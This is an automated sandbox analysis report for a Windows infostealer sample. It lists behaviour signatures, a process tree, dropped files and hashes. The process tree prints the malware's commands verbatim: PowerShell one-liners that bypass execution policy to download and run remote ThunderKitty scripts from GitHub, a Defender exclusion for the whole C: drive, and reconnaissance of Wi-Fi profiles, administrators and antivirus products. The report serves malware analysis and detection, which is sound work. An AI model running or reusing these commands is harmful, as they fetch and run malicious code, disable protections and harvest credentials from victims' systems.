Analysis

  • max time kernel
    139s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2024, 03:30

General

  • Target

    2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe

  • Size

    14.0MB

  • MD5

    fbf595ccb3a26a991f0dcaf5274dbb8c

  • SHA1

    2db2d7706398199769ba592e985bc0d598203ee9

  • SHA256

    77dbeb3e4ee87a33f06611428d479e4e9b4c3de2a65d8fc3d8403c8dfd70fa14

  • SHA512

    00e20cbf499840826efd277e78f2e105fcff9ffc2ab05496939802b680a45190d8df1c2730541078eca43a97851cfdd3cd8ca6e1a3834bd06faf6753cbb114b8

  • SSDEEP

    196608:PzJfx6npoO2feFbQ8W47ibVIEc79PVJUW9ydW:PZxTOI/8D6IPWmU

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Looks for VMWare drivers on disk 2 TTPs 2 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-08-25_fbf595ccb3a26a991f0dcaf5274dbb8c_poet-rat_snatch.exe"
    1⤵
    • Looks for VirtualBox drivers on disk
    • Looks for VMWare drivers on disk
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2492
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtop5ekd\qtop5ekd.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2276
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6939.tmp" "c:\Users\Admin\AppData\Local\Temp\qtop5ekd\CSCA217C1AF72CE478085479C8BE11A7F7C.TMP"
          4⤵
            PID:3676
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:448
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4628
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:2448
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:2836
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:1956
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:1756
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:984
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1200
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:4392
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:808
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:548
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:4344
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:2700
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:1908
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:3016
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:3220
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4556
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3696
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ocsvchmx\ocsvchmx.cmdline"
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4880
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D31.tmp" "c:\Users\Admin\AppData\Local\Temp\ocsvchmx\CSC3AA5B6DA58544110B93A171C23E24E30.TMP"
                          4⤵
                            PID:4392
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c start facebook.com
                        2⤵
                          PID:976
                        • C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
                          PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1948
                        • C:\Windows\system32\cmd.exe
                          cmd /c rundll32.exe user32.dll,SwapMouseButton
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4552
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe user32.dll,SwapMouseButton
                            3⤵
                              PID:1636
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
                            2⤵
                            • Views/modifies file attributes
                            PID:716
                          • C:\Windows\system32\taskkill.exe
                            taskkill /F /IM wallpaper32.exe
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3028
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x528 0x520
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2316

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          67b0a41134410b2b0ad5e01f6966ac1b

                          SHA1

                          fe54ad45f0ad2550513048e681ddfa2a47e25a8b

                          SHA256

                          d44434e0ea080223e4afa9ed4316cab5805e3d28221df9e8b7e2789a4518faa9

                          SHA512

                          efa1f52521bd420657ac5da046b355fc2717f372ebe2fceb4c6e70f26b5a7ec38895131f564b92def508036453669af22262b464c2abfabc664ef4594233e663

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          fa683ba35bef5db77615e4281ba4c0fc

                          SHA1

                          e5d1b282d5160ccbc965b946bcbdaf27f99b0c2e

                          SHA256

                          d02a84de5459810a45b0434f93ecdb8413791c0ada1ae71210a92eed037538a6

                          SHA512

                          a181c916e3df8aefb8d458799e8aafb687007751a425bd288dfcd5de41c93529fde2dd5d6602a075e50f4f2f90886c9a2e6f7255b64325758ae5f355317a36e5

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          3e2239307a53cbc7115fa375e0dd3a4f

                          SHA1

                          66dd1bf7a2f3ab5a34365c35456dcd73b515911f

                          SHA256

                          68f09fa9f10ee1a8f256d6630285b9f77f2713b676c3a635ceb17adae1e6e7b9

                          SHA512

                          852baecba0a8a88854a9c5042b521beb9be41cb50b6f3408cdcb6002ed99533969139a0cf30ea5965783e1460e597a293ff7a5255694f4ea3b9cd599e041378b

                        • C:\Users\Admin\AppData\Local\Temp\RES6939.tmp

                          Filesize

                          1KB

                          MD5

                          b576421aeeb591ef92e083e4107c7cd2

                          SHA1

                          68916921a4c6ac8651e121ceef61d076a38bb9a9

                          SHA256

                          5fc3bebbaa6525cb283bfc649795a0eb76cb8a6c9208ef1ff726501862eae6a3

                          SHA512

                          84e4643623de97ba017bbda0cd7ff010ecd6289baecdd52b11329e9613136e9e6b37965749bf9fff730066dfac5c4d863e2fd17fa809f131ac6fced8a9a1ca22

                        • C:\Users\Admin\AppData\Local\Temp\RES6D31.tmp

                          Filesize

                          1KB

                          MD5

                          2a5719d526fffa4493be04c1f6793c6a

                          SHA1

                          04f8b46398851f12ccb3c2613551bc20f5dfd92f

                          SHA256

                          a213fd15ee7896aca7d6a0d94a3735f935e1375c9be763e07c214dcb8fbf8687

                          SHA512

                          df4d98b9634dd28ca8f7e6cc5e6d5707f6af3cc8a3343de96d85dcac52892b03cafe1164f2fbfd7aca4d14a0156788403ab89117842f4831ed6681091952a8a0

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                          Filesize

                          72KB

                          MD5

                          ceb878cd4df4530dfe953cf2995595a0

                          SHA1

                          50c5c3f5cc26e25b7cb60d1ce6b9589682401ab4

                          SHA256

                          04ef4d1fd71a2949ac50b3887061674ae3a8e91e768d28af761feb2f857cea8f

                          SHA512

                          125a0b56ac7d1945a8d357d81ad75674b29840faecec74e3f8a5237a61871aacec3f21b1e1d2b6c34e3feb41c7a3d651b0e797ccae4f2081e3b1e31950448c78

                        • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                          Filesize

                          22KB

                          MD5

                          77e69a80baaf16d9fdf5e0b4cbe5f4a7

                          SHA1

                          86abfb176ddb0813b528aa04f46bdbebd537c017

                          SHA256

                          11ee7032526cc69f39bcb69f5c0d7a06353e9944d359a90ecb6ecfd1764dd042

                          SHA512

                          fa5dd78056c7ae0c4532688bf1f524ae03d2bcd88e2a2b61aad6f65e77092aca8164743a4ae402ab65c3def44560c30f0208c1d20871a4590b6f428f37371d09

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5h2q4e3e.leh.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\ocsvchmx\ocsvchmx.dll

                          Filesize

                          4KB

                          MD5

                          966648822c45b8d1cf1bc901377689a8

                          SHA1

                          059ae2f10e9e7b8c97f60b19a176a8607f84397d

                          SHA256

                          47bd62591b4d76772059670d0c70e53d495050413f92abe9106373e97f7bf38c

                          SHA512

                          6eb15a9f1b671af03e6dc9763a5e89f0577f6eb4927825a334fadd14d369035b33c015072beb9a20497deb54be9d20b7433ff958ea2e15c99459cc78e0c28cc1

                        • C:\Users\Admin\AppData\Local\Temp\qtop5ekd\qtop5ekd.dll

                          Filesize

                          4KB

                          MD5

                          d83bb226a6424e633a0edfc878ca0aa1

                          SHA1

                          2b817e66741e5df1a4a016fca49f3a1c51cee033

                          SHA256

                          6b4a5b37cbce2b975eb3389b2ce6244d1db1ebd6e9f423bd77401ab4c46158d1

                          SHA512

                          f5092812f62e040b22e3bc77a1358c676557d789813ccf687db100c5a1d4adb6f44a567c0c6636bd60d3354cbf9de24706b87b8abd8805f471e6fcbf44800d81

                        • C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

                          Filesize

                          2KB

                          MD5

                          9758656bbe8589c66bb241b052490c72

                          SHA1

                          b73da83fb3ae6b86c6365769a04de9845d5c602c

                          SHA256

                          e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

                          SHA512

                          da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

                        • \??\c:\Users\Admin\AppData\Local\Temp\ocsvchmx\CSC3AA5B6DA58544110B93A171C23E24E30.TMP

                          Filesize

                          652B

                          MD5

                          b9d3476adce99e7479a7caf950862a3a

                          SHA1

                          a57837a622da83f056e977309646b07c2ffa6581

                          SHA256

                          99e361e1b429443acf2bb51e8fadb45f719aa28162736dac20a9e1d4930941f6

                          SHA512

                          980f1274019962c747bbc8ea2b509269c02deeeaa55c1524f7e0082370efa673e2b36a014e19ff5ed04a868033ee2607ae9c490e4ae4171fa2b700dc6e6e07f4

                        • \??\c:\Users\Admin\AppData\Local\Temp\ocsvchmx\ocsvchmx.cmdline

                          Filesize

                          369B

                          MD5

                          fe9dd49c506b17fa315125c8fa94f85b

                          SHA1

                          becb073aa74b100d38fc39bdf9406da0ca8f6b17

                          SHA256

                          1f08b5d6e90d29bd37147ca5513bf7c73a0858aae7c1c73b0a349397d5a9f7e5

                          SHA512

                          49bb027f6596f02515ce6634a605f3beae2e96e2634a7e9dffb6acc4e5c04b35ac628d4f2f6c82c76622830a81d08fef101485794319c0addd155e2882d49008

                        • \??\c:\Users\Admin\AppData\Local\Temp\qtop5ekd\CSCA217C1AF72CE478085479C8BE11A7F7C.TMP

                          Filesize

                          652B

                          MD5

                          80eb912bac25e802ee940308472f82e3

                          SHA1

                          173fd09d9b70ca0fc0138669f8b9d30cd4a541a1

                          SHA256

                          0717748dcda9cb742508a7e9e6c756f75197e6ad249c257619918e643dc9a259

                          SHA512

                          f9ccc7d1ddfd0d09f9873c10761fcb137cbd0f347884c01b7600fc532fd7fce887d9f162e98041a3b8e095fe004bb15c0335fac063095f8300e1fadf3dc26155

                        • \??\c:\Users\Admin\AppData\Local\Temp\qtop5ekd\qtop5ekd.0.cs

                          Filesize

                          1KB

                          MD5

                          8a1e7edb2117ec5dde9a07016905923b

                          SHA1

                          0155dbeeb16333e2eaa767b0209750efee56f47f

                          SHA256

                          c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                          SHA512

                          4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                        • \??\c:\Users\Admin\AppData\Local\Temp\qtop5ekd\qtop5ekd.cmdline

                          Filesize

                          369B

                          MD5

                          35b32eee9f6048eec820217b4e522c7b

                          SHA1

                          58de46d5affbbc4bee51a189745c048047fdd160

                          SHA256

                          a7d964f4e370a0df0bb122d73835be70b0b52f56b052fdd00f0aa257164ffb2f

                          SHA512

                          43ab01f752729ba4bd4ba04f64d36b791f45f61056e26c9ec2aacc52e69f2beb743f3ee85c466da8b72a88a3844a1f39957fc0f6f101b8311de9f4ea25e4b524

                        • memory/2492-77-0x0000011F767E0000-0x0000011F767E8000-memory.dmp

                          Filesize

                          32KB

                        • memory/2492-144-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2492-101-0x0000011F79250000-0x0000011F7927A000-memory.dmp

                          Filesize

                          168KB

                        • memory/2492-135-0x0000011F79230000-0x0000011F7923A000-memory.dmp

                          Filesize

                          40KB

                        • memory/2492-46-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2492-134-0x0000011F79240000-0x0000011F79252000-memory.dmp

                          Filesize

                          72KB

                        • memory/2492-90-0x0000011F796A0000-0x0000011F79E46000-memory.dmp

                          Filesize

                          7.6MB

                        • memory/2492-45-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2492-44-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2492-102-0x0000011F79250000-0x0000011F79274000-memory.dmp

                          Filesize

                          144KB

                        • memory/3696-84-0x00000253E67E0000-0x00000253E67E8000-memory.dmp

                          Filesize

                          32KB

                        • memory/3696-98-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3696-42-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3696-23-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3696-47-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4556-13-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4556-89-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4556-11-0x000001FFED000000-0x000001FFED022000-memory.dmp

                          Filesize

                          136KB

                        • memory/4556-0-0x00007FFC5B023000-0x00007FFC5B025000-memory.dmp

                          Filesize

                          8KB

                        • memory/4556-1-0x00007FFC5B020000-0x00007FFC5BAE1000-memory.dmp

                          Filesize

                          10.8MB